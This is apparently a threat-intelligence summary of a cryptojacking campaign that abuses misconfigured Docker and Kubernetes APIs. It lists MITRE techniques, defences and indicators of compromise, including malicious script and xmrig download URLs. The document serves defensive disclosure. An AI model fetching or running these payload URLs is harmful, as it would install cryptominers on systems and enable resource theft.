Summary :
A recent increase in cryptojacking attacks has exploited unsecured Docker and Kubernetes environments, using misconfigurations to gain unauthorized access for cryptocurrency mining. These attacks primarily target high-performance cloud infrastructures, leading to significant operational disruptions. #Cryptojacking #CloudSecurity #Docker
Keypoints :
- Cryptojacking campaigns are exploiting misconfigured Docker and Kubernetes environments.
- Attackers target open API endpoints to deploy malicious containers for cryptocurrency mining.
- Organizations in finance, healthcare, and technology are particularly at risk.
- Defensive strategies include securing APIs, monitoring container activity, and patch management.
MITRE Techniques :
- Linux and Mac File and Directory Permissions Modification (T1222.002): Modifies file and directory permissions to facilitate unauthorized access.
- Cron (T1053.003): Utilizes cron jobs to schedule the execution of malicious scripts.
- SSH (T1021.004): Leverages SSH for lateral movement within the compromised environment.
Indicator of Compromise :
- [ip address] 45.9.148.35
- [ip address] 164.68.106.96
- [ip address] 192.155.94.199
- [ip address] 147.75.47.199
- [file hash] 82874f856a71a751f0bdb1ce7a3b7bb6
- [file hash] e10e3934d7659e00cc7f47b569af9ff5
- [file hash] 505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a
- [url] http://45.9.148.35/aws
- [url] http://solscan.live/sh/init.sh
- [url] https://solscan.live/bin/xmrig
- [url] http://solscan.live/sh/xmr.sh.sh
- [url] http://solscan.live/sh/setup_xmr.sh
- [url] http://solscan.live/incoming/docker.php?dockerT=
A recent surge in cryptojacking campaigns has targeted unsecured Docker and Kubernetes environments, exploiting misconfigurations to gain unauthorized access. These attacks leverage open API endpoints in Docker hosts, allowing threat actors to deploy malicious containers designed for cryptocurrency mining, specifically Monero. The campaign primarily targets high-performance cloud infrastructures, draining system resources and leading to significant operational slowdowns for affected organizations.
AI illustration of the cyberjacking campaign
The attacks underscore the growing trend of resource hijacking in cloud environments, where attackers exploit common deployment misconfigurations. As the campaign evolved, the malware demonstrated advanced lateral movement capabilities, enabling it to infect multiple containers across networks, prolonging the attack and maximizing cryptocurrency mining gains before detection.
Key Attack Techniques
The campaign capitalized on exposed Docker API endpoints lacking proper authentication, allowing attackers to remotely execute commands and deploy cryptocurrency-mining containers. Once inside, the attackers utilized sophisticated lateral movement techniques to infect other containers within the same environment, maximizing their control and mining capabilities.
Organizations in sectors such as finance, healthcare, and technology, which rely on container-based cloud infrastructures, are at significant risk. These cryptojacking operations can severely impact service performance, drive up costs, and cause major business disruptions.
Defensive Strategies
To mitigate the risk of cryptojacking, organizations should:
- Secure Docker and Kubernetes APIs: Implement proper authentication measures and ensure endpoints are not publicly exposed.
- Monitor Container Activity: Set up robust monitoring mechanisms to detect unusual container activities that might signal a cryptojacking operation.
- Limit Resource Usage: Apply resource constraints to containers, minimizing the potential damage from any unauthorized activity.
- Patch Management: Regularly update container environments to avoid known vulnerabilities.
Indicators of Compromise (IOC) and Techniques (TTP)
| Category | Details |
| IP Addresses | 45.9.148.35, 164.68.106.96, 192.155.94.199, 147.75.47.199 |
| Hashes | 82874f856a71a751f0bdb1ce7a3b7bb6, e10e3934d7659e00cc7f47b569af9ff5, 505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a |
| URLs | http://45.9.148.35/aws, http://solscan.live/sh/init.sh, https://solscan.live/bin/xmrig |
| TTP (MITRE ATT&CK) | T1222.002: Linux and Mac File and Directory Permissions Modification, T1053.003: Cron, T1021.004: SSH |
| Killchain Stage | Initial Exploitation, Privilege Escalation, Execution, Lateral Movement |
| Malicious Scripts | Example: http://solscan.live/sh/xmr.sh.sh, http://solscan.live/sh/setup_xmr.sh, http://solscan.live/incoming/docker.php?dockerT= |
This cryptojacking campaign continues to evolve, highlighting the vulnerabilities inherent in container environments. Organizations should prioritize securing cloud-based systems and monitoring for signs of resource hijacking.
In conclusion, this surge in cryptojacking attacks targeting Docker and Kubernetes environments highlights the urgent need for robust cloud security measures. To stay informed about evolving cyber threats, including campaigns similar to this cryptojacking incident, explore other active threats listed on the SOCRadar Campaigns page. Here, you’ll find detailed insights into current cyber campaigns, helping you safeguard your organization against emerging threats.
Full Research: https://socradar.io/blog-cryptojacking-campaign-targets-docker-and-kubernetes-surge-in-container-based-attacks/